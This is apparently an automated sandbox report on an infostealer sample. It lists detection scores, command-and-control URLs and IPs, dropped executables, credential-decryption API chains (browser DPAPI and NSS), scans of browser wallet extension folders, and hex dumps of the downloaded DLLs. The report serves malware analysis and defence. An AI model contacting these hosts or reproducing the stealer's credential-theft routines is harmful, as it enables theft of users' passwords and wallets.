                          Source: http://77.91.77.81/Kiru9gu/index.phpVirustotal: Detection: 23%Perma Link
                          Source: http://85.28.47.31Virustotal: Detection: 20%Perma Link
                          Source: http://85.28.47.31/5499d72b3a3e55be.php/Virustotal: Detection: 19%Perma Link
                          Source: http://85.28.47.31/5499d72b3a3e55be.php4Virustotal: Detection: 19%Perma Link
                          Source: http://85.28.47.31/5499d72b3a3e55be.php$Virustotal: Detection: 15%Perma Link
                          Source: http://85.28.47.31/5499d72b3a3e55be.phpvVirustotal: Detection: 18%Perma Link
                          Source: http://85.28.47.31/8405906461a5200c/sqlite3.dlljVirustotal: Detection: 15%Perma Link
                          Source: http://85.28.47.31/5499d72b3a3e55be.phpxVirustotal: Detection: 15%Perma Link
                          Source: http://85.28.47.31/8405906461a5200c/nss3.dllVirustotal: Detection: 9%Perma Link
                          Source: http://85.28.47.31/5499d72b3a3e55be.phphVirustotal: Detection: 15%Perma Link
                          Source: http://85.28.47.31/5499d72b3a3e55be.phpcVirustotal: Detection: 19%Perma Link
                          Source: http://85.28.47.31/8405906461a5200c/softokn3.dllVirustotal: Detection: 17%Perma Link
                          Source: http://85.28.47.31/8405906461a5200c/mozglue.dllVirustotal: Detection: 17%Perma Link
                          Multi AV Scanner detection for dropped file
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\num[1].exeReversingLabs: Detection: 91%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exeReversingLabs: Detection: 36%
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeReversingLabs: Detection: 57%
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeReversingLabs: Detection: 57%
                          Multi AV Scanner detection for submitted file
                          Source: file.exeVirustotal: Detection: 37%Perma Link
                          Source: file.exeReversingLabs: Detection: 36%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\Users\userGDHIIIIEHC.exeJoe Sandbox ML: detected
                          Source: C:\Users\userCFHCBKKFIJ.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: file.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: e$@@
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: @ssj
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: mnopqrs
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: efghijklmnopqrs
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: %s\%_
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: 7ens]
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: mnopqrs
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: 0123pewgq9+/A
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: KccontTekeny
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: ,Xef].js..
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: }ord
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: 7)+)/)UVWXY
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: efghijklmnopqrs
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: `z`@J@@@J@@@
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: efghijklmnopqrs
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: tuvwxyz{|}
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: GetSystemInfo
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: JAJI}p
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: `|c63O
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: ToMultiByte
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: GdipFree
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: CoInitialize
                          Source: 47.2.4ddf12fb51.exe.400000.0.raw.unpackString decryptor: plugins
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409BB0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418940
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,0_2_0040C660
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407280
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409B10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA36C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,0_2_6CA36C80

                          Compliance

                          barindex
                          Detected unpacking (overwrites its own PE header)
                          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack
                          Source: C:\Users\userCFHCBKKFIJ.exeUnpacked PE file: 9.2.userCFHCBKKFIJ.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeUnpacked PE file: 47.2.4ddf12fb51.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeUnpacked PE file: 50.2.4ddf12fb51.exe.400000.0.unpack
                          Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49716 version: TLS 1.0
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49710 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49712 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.6:49713 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49719 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 20.190.160.17:443 -> 192.168.2.6:49754 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49789 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.6:49814 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:49825 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49826 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 18.66.102.82:443 -> 192.168.2.6:49827 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49832 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49834 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49835 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49839 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49889 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49888 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49886 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49884 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49885 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49887 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49893 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49892 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49902 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49969 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50148 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50169 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50170 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50168 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50172 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50173 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50171 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50178 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50179 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50177 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50343 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.89.179.11:443 -> 192.168.2.6:50357 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50443 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50445 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50586 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58815 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58816 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58817 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58814 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58813 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58818 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58821 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58824 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58823 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:58912 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:58916 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:58918 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62281 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62280 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62309 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62308 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62305 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62310 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62306 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62307 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62313 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62314 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:62312 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:62360 version: TLS 1.2
                          Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmp
                          Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmp
                          Source: Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdbV source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdb source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmp
                          Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmp
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040D8C0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F4F0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BCB0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_004139B0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E270
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401710
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004143F0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DC50
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,0_2_00414050
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040EB60
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004133C0
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: firefox.exeMemory has grown: Private usage: 0MB later: 96MB

                          Networking

                          barindex
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: http://85.28.47.31/5499d72b3a3e55be.php
                          Source: Malware configuration extractorURLs: http://85.28.47.31silence/5499d72b3a3e55be.php
                          Source: global trafficTCP traffic: 192.168.2.6:58811 -> 1.1.1.1:53
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 24 Jul 2024 05:14:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 24 Jul 2024 05:14:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 24 Jul 2024 05:14:18 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 